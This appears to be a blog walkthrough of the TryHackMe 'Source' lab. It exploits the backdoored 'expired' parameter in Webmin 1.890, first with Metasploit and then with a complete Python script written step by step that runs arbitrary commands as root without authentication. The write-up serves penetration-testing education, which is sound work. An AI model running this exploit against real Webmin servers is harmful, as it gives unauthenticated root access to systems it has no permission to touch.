SOURCE TRYHACKME WALKTHROUGH AND EXPLOIT DEVELOPMENT OF SOURCE WEBMIN VULNERABILITY USING PYTHON

Hello guys back again with another walkthrough and this time am going to be taking you guys through how i solved source from TryHackMe the box is really simple with very few steps we’ll use metasploit module to get a shell on the box as the root user so i decided to show you guys how to create a python exploit script to do the same. Without much say let’s jump in

As always we’ll start off with a nmap scan and as seen below we have two ports that are open ssh and HTTP

I decided to google to see if those versions had vulnerability and webmin 1.890 had remote code execution vulnerabilities

1. MiniServ 1.890 (Webmin httpd) which is vulnerable to remote code execution vulnerability though a backdoor that was planted on the source code

Since the webmin vulnerability sounded juicy i decided to try it first and what makes our job even easier to exploit is that A remote, unauthenticated attacker can exploit this to execute arbitrary commands without knowing the valid credential from the server sweet and dangerous right !!!!

The vulnerability exists in the “expire” parameter. If we pass a system command it gets executed. Doing some more google search we get a metasploit module for the attack so i decided to load metasploit and then filled the required parameters as seen below

N/B MAKE SURE SSL IS SET TO TRUE SINCE THE SERVER IS RUNNING OON HTTPS

And i ran the exploit and after a few second got a shell

And after upgrading my shell i was root on the box

Now we can submit both the user and root flag and get the points

And the box is done!!!!

CREATING A PYTHON SCRIPT TO AUTOMATE THE EXPLOITATION

As an attacker just exploiting a vulnerability isn’t enough it beneficial to know exactly what happens behind the scene (NOT JUST GETTING A SHELL ) because knowing this enable you a cybersecurity researcher or penetration tester or hacker to reproduce the exploit if you were asked to. And for this walkthrough I’ll be using python programming language since it’s the easiest and most efficient to write exploits. Below is a python script that i wrote that executes commands on the system and outputs the result of the command

For this tutorial am going to be using VSCodium a VSCode version of parrotOS which i really love and i will use an extension called arepl which it run the python code in real time as am writing and also gives a warning if there are any errors in my code while am writing

Let’s jump right in

First well need to import requests library which will handle our HTTP requests and sys will allow us to perform http requests

Now I’ll define a variable cmd which will contain the command to be executed

Now I’ll define the second variable host that will contain the the hosts IPAddress

The third variable will contain the URL as seen below

Now I’ll define the last variable called sess that will save all the session cookies that i make to the web server

Next I’ll create a variable called data with post data parameters (user, pam, expired, old, new1 and new2) this are the postdata that I’ll send to the web server and if you see clearly my cmd variable will be injected in the expired parameter in the post data

Now it’s time to send our first request to the server using the The password_change.cgi which changes the password of the webmin server using a post parameter and we’ll send our postdata defined above to the URL

But as seen from the URL we get a certificate verification failed error we can simply bypass this by telling request not to verify the certificate as seen below

And voila as seen below the error is gone

Now to get an output of the request made to the server we use print command

And voila as seen above the request was submitted successfully but we get an error from webmin because we don’t have a referer in out header which contains address of the previous web page from which a link to the currently requested page was followed. The Referer header allows servers to identify where people are visiting them from and may use that data for analytics, logging, or optimized caching

So Next we add a referer in our request header using the header tag in the URL using the syntax below

exploit = sess.post(url, data=postdata, verify=False, headers = {"Referer": "https://" + host + ":10000/session_login.cgi"}).text

And after adding the referer we get an output of ifconfig system command

Doing a directory listing using the cmd variable we get an output

That was simple right our exploit works perfectly right

Now we can go a step further and add arguments that will allow us to pass arguments to our python script

Now the first argument that well pass to our script is the IPAddress and the second argument is command to be executed let’s try executing the python script in our terminal and see if it works

And voila as seen above our script works fine now i’ll leave an assignment for you to try removing the certification verification error and try using regular expression to remove the unwanted information from the screen so that only the system command can be printed in the screen

But the script that i created i here below

import requests
import sys
host = "10.10.134.87"
cmd = "ifconfig"
url = "https://" + host +":10000/password_change.cgi"
sess = requests.session()
postdata = {
"user" : "pleaselikethewalkthrough",
"pam" : "",
"expired" : cmd,
"old" : "root",
"new1" : "newpassword",
"new2" : "newpassword"
}
exploit = sess.post(url, data=postdata, verify=False, headers = {"Referer": "https://" + host + ":10000/session_login.cgi"}).text
print(exploit)

You can use it and modify however you want guys

That’s it for now guys till next time take care and if you liked the walkthrough you can clap for me down below

--

--

--

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DECODING HEALTHCARE PROBLEMS THROUGH SECURE EMAIL-POWERED BY PAUBOX

5 Simple WhatsApp Tricks You Should Know

Bridging the Gap: Communicating Security Risks to Executives

Asterix Network Security Audit Report on Smart Contract by Contract Wolf

Top 25 Clickjacking Bug Bounty Reports

Why Should We Reverse Engineer IoT Devices?

TryHackMe write-up: Source

{UPDATE} Thirty one Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Musyoka Ian

Musyoka Ian

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

More from Medium

Try Hack Me | Lazy Admin

Paper— HackTheBox Write-up

Linux PrivEsc

TryHackMe: Bookstore